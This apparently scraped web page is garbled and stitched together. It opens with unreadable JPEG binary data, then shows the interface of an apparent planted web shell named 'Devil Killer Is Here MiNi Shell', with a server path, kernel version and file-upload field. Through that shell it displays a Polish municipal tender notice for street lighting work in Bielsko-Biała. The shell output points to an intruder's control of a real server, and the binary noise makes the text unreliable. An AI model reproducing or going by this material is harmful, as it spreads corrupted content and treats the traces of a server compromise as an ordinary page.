JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250303/0012792301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Wykonanie instalacji oświetlenia ulicznego wraz z dokumentalno- budowlano-wykonawczą na ul. Małej Straconki 98, ul. J.Sowińskiego, ul.Jaskrowej, ul.Romańskiej, ul.Zdrowej w BB–5 cz.postępowania”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Bielsko-Biała Urząd Miejski w Bielsku-Białej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072181741</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.bielsko-biala.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.um.bielsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonanie instalacji oświetlenia ulicznego wraz z dokumentalno- budowlano-wykonawczą na ul. Małej Straconki 98, ul. J.Sowińskiego, ul.Jaskrowej, ul.Romańskiej, ul.Zdrowej w BB–5 cz.postępowania”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5fdc730f-b5c8-48b7-a14a-fbeb3e0a804b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00127923</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00042302/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.16 Remont oświetlenia ulicznego na terenie Miasta Bielska-Białe oraz będącego własnością gminy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://um-bielsko.logintrade.net/zapytania_email,191278,aafa97ecf2b7e9f1f6e822455a90c17f.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platforma Logintrade dostępna pod adresem: https://um-bielsko.logintrade.net/zapytania_email,191278,aafa97ecf2b7e9f1f6e822455a90c17f.html oraz adres e-mail.:<br/>aleksandra.bulawczyk@um.bielsko-biala.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w nin. postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. W nin. postępowaniu o udzielenie zamówienia publicznego środkami komunikacji elektronicznej między Zamawiającym a<br/>Wykonawcami jest Platforma przetargowa Logintrade (dalej jako: Platforma), dostępna na stronie internetowej pod adresem:<br/>https://um-bielsko.logintrade.net/ oraz poczta elektroniczna: zp@um.bielsko-biala.pl lub aleksandra.bulawczyk@um.bielsko-biala.pl.<br/>UWAGA: składanie ofert w postępowaniu odbywa się wyłącznie za pośrednictwem ww. Platformy.<br/>3. Zaleca się aby Wykonawca, który zamierza wziąć udział w postępowaniu o udzielenie zamówienia publicznego, posiadał konto na<br/>Platformie. Wykonawca posiadający konto na Platformie ma możliwość złożenia, wycofania oferty oraz składania wniosków o<br/>wyjaśnienie treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>4. Instrukcje dla użytkowników Platformy, w tym wymagania techniczne związane z korzystaniem z Platformy wskazane są pod<br/>adresem: https://umbielsko.logintrade.net/rejestracja/instrukcje.html.<br/>5. Wsparcia technicznego Wykonawcom w zakresie działania Platformy udziela jej Właściciel, tj. Logintrade S.A. z siedzibą:, ul.<br/>Legnicka 57D, lokal B/J, 54-203 Wrocław, www.logintrade.pl, pod numerem telefonu: +48 71 787 35 34, od poniedziałku do piątku w<br/>godzinach od 8:00 do 16:00, e-mail: helpdesk@logintrade.net<br/>6. Sposób sporządzania i przekazywania informacji w postępowaniu o udzielenie zamówienia publicznego określają rozporządzenie<br/>Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie oraz rozporządzenie Ministra Rozwoju, pracy i technologii z dnia 30 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>7. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ustawy Pzp, przedmiotowych środków dowodowych,<br/>podmiotowych środków dowodowych oraz innych oświadczeń i dokumentów przyjmuje się datę ich wpływu na Platformę, a nie datę<br/>wykonania danej czynności przez Wykonawcę na Platformie<br/>8. Oferta, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy,<br/>przedmiotowe środki dowodowe, pełnomocnictwo,<br/>sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia<br/>17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne , z zastrzeżeniem formatów, o których<br/>mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. Pozostałe postanowienia zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) - zwanego<br/>dalej „RODO”, informujemy<br/>o tym, że:<br/>1) Administratorem Danych Osobowych jest Miasto Bielsko-Biała reprezentowane przez Prezydenta Miasta Bielska-Białej, z<br/>siedzibą: 43-300 Bielsko-Biała, pl. Ratuszowy 1. 2) Administrator wyznaczył Inspektora Ochrony Danych, z którym można skontaktować się<br/>w sprawach związanych z ochroną danych osobowych, elektronicznie: iod@um.bielsko-biala.pl lub pisemnie: na adres siedziby<br/>Administratora.<br/>3) Dane osobowe przetwarzane będą w celu przeprowadzenia przedmiotowego postępowania<br/>o udzielenie zamówienia publicznego, na podstawie art. 6 ust. 1 lit. c RODO w związku<br/>z przepisami ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych. 4) Dane osobowe będą przechowywane przez<br/>okres niezbędny do realizacji wskazanych celów przetwarzania, lecz nie krócej niż<br/>przez okres wskazany w przepisach o archiwizacji oraz w przepisach ustawy dot. zamówień publicznych. Okres przetwarzania może<br/>ulec przedłużeniu o okres przedawnienia potencjalnych<br/>roszczeń, jeżeli przetwarzanie danych osobowych będzie niezbędne dla ustalenia lub dochodzenia ewentualnych roszczeń lub<br/>obrony przed takimi roszczeniami.<br/>5) Dane osobowe mogą być udostępnione wyłącznie podmiotom lub organom uprawnionym na podstawie przepisów prawa, a także<br/>na podstawie umów powierzenia, m.in. dostawcom systemów informatycznych oraz usług IT. Przekazywanie danych osobowych<br/>dokonywane jest wyłącznie we wskazanych celach. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp.<br/>6) W zakresie przetwarzania danych osobowych posiadają Państwo następujące prawa:<br/> dostępu do danych osobowych, zgodnie z art. 15 RODO,<br/> sprostowania danych osobowych, zgodnie z art. 16 RODO, przy czym skorzystanie<br/>z prawa do sprostowania nie może skutkować zmianą wyniku postepowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym<br/>z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników, ograniczenia przetwarzania danych<br/>osobowych, zgodnie z art. 18 RODO, przy czym możliwość (zakres i sytuacje) skorzystania z wymienionych praw uzależniona jest<br/>od spełnienia przesłanek określonych w przepisach prawa oraz podstawy prawnej i celu przetwarzania danych osobowych.<br/>7) Nie przysługuje Państwu:<br/> prawo do usunięcia danych osobowych, o którym mowa w art. 17 RODO,<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/> prawo do sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych<br/>jest realizacja obowiązku prawnego ciążącego na Administratorze.<br/>Ciąg dalszy w kolejnym punkcie:</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ciąg dalszy z poprzedniego punktu: 8) W przypadku uznania, że przetwarzanie danych<br/>osobowych odbywa się w sposób niezgodny<br/>z prawem przysługuje Państwu prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>9) Dane osobowe nie będą przetwarzane w sposób zautomatyzowany i nie będą profilowane.<br/>10) Podanie danych osobowych jest wymogiem ustawowym niezbędnym do realizacji wskazanych celów. Konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp.<br/>11) Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO, w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>2. Wykonawca zobowiązuje się do:<br/>a) wypełniania obowiązków przewidzianych w art. 13 lub art. 14 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z<br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie<br/>o ochronie danych), wobec osób fizycznych,<br/>b) do przestrzegania przepisów ustawy z dnia 10 maja 2018 roku o ochronie danych osobowych.<br/>3. Wykonawca oświadcza, że:<br/>a) zapewnia, że wdrożył i stosuje odpowiednie środki techniczne i organizacyjne spełniające wymogi zakreślone aktami prawnymi,<br/>aby przetwarzanie danych osobowych spełniało wymogi wynikające z obowiązujących przepisów o ochronie danych osobowych oraz<br/>RODO mających zastosowanie i chroniło prawa osób, których dane dotyczą,<br/>b) w przypadku korzystania z podwykonawców/dalszych podwykonawców zapewni aby zostały przez nich wdrożone odpowiednie<br/>środki techniczne i organizacyjne, aby przetwarzanie danych osobowych spełniało wymogi wynikające z obowiązujących przepisów<br/>o ochronie danych osobowych oraz RODO mających zastosowanie i chroniło prawa osób, których dane dotyczą.<br/>4. Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie<br/>co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>1) W celu zapewnienia, że wykonawca wypełnił, określone, obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów<br/>osoby trzeciej, której dane zostały przekazane<br/>w związku z udziałem wykonawcy w nin. postępowaniu, zobowiązany jest do złożenia w nin. postępowaniu o udzielenie zamówienia<br/>publicznego oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.23.2025.AB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Wykonanie instalacji oświetlenia ulicznego wraz <br/>z dokumentacją budowlano-wykonawczą na ulicy Małej Straconki 98, Józefa Sowińskiego, Jaskrowej, Romańskiej, Zdrowej w Bielsku-Białej.<br/><br/>2.	Zakres robót obejmuje w szczególności: <br/><br/>CZĘŚĆ I – ulica Małej Straconki 98 <br/>1)	W oparciu o program funkcjonalno-użytkowy należy opracować dokumentację projektową oraz wykonać instalacje oświetleniową. Planowane parametry zakresu prac: <br/>a)	linia napowietrzna o przekroju 2x25 mm2 – około 125 m <br/>b)	słupy betonowe E10,5 – około 5 szt.<br/>c)	oprawy LED z zabezpieczeniami, wyposażone w gniazda ZHAGA – około 5 szt. <br/>o parametrach określonych w programie funkcjonalno-użytkowym punkt 2.1. <br/>Oprawy nie mogą generować mocy biernej pojemnościowej.<br/>2)	Szczegółowy opis przedmiotu zamówienia zawierają załączniki: program funkcjonalno-użytkowy oraz tabela elementów rozliczeniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">280 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Wykonanie instalacji oświetlenia ulicznego wraz <br/>z dokumentacją budowlano-wykonawczą na ulicy Małej Straconki 98, Józefa Sowińskiego, Jaskrowej, Romańskiej, Zdrowej w Bielsku-Białej.<br/><br/>2.	Zakres robót obejmuje w szczególności: <br/>CZĘŚĆ II – ulica Józefa Sowińskiego <br/>1)	W oparciu o program funkcjonalno-użytkowy należy opracować dokumentację projektową oraz wykonać instalacje oświetleniową. Planowane parametry zakresu prac: <br/>a)	linia napowietrzna o przekroju 4x25 mm2 – około 245 m <br/>b)	słupy betonowe E10,5 – około 7 szt.<br/>c)	oprawy LED z zabezpieczeniami, wyposażone w gniazda ZHAGA – około 7 szt. <br/>o parametrach określonych w programie funkcjonalno-użytkowym punkt 2.1. <br/>Oprawy nie mogą generować mocy biernej pojemnościowej.<br/>2)	Szczegółowy opis przedmiotu zamówienia zawierają załączniki: program funkcjonalno-użytkowy oraz tabela elementów rozliczeniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">280 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Wykonanie instalacji oświetlenia ulicznego wraz <br/>z dokumentacją budowlano-wykonawczą na ulicy Małej Straconki 98, Józefa Sowińskiego, Jaskrowej, Romańskiej, Zdrowej w Bielsku-Białej.<br/><br/>2.	Zakres robót obejmuje w szczególności: <br/>CZĘŚĆ III – ulica Jaskrowej<br/>1)	W oparciu o program funkcjonalno-użytkowy należy opracować dokumentację projektową oraz wykonać instalacje oświetleniową. Planowane parametry zakresu prac: <br/>a)	linia napowietrzna o przekroju 2x25 mm2 – około 270 m <br/>b)	słupy betonowe E10,5 – około 7 szt.<br/>c)	oprawy LED z zabezpieczeniami, wyposażone w gniazda ZHAGA – około 7 szt. o parametrach określonych w programie funkcjonalno-użytkowym punkt 2.1. <br/>Oprawy nie mogą generować mocy biernej pojemnościowej. <br/>2)	Szczegółowy opis przedmiotu zamówienia zawierają załączniki: program funkcjonalno-użytkowy oraz tabela elementów rozliczeniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji 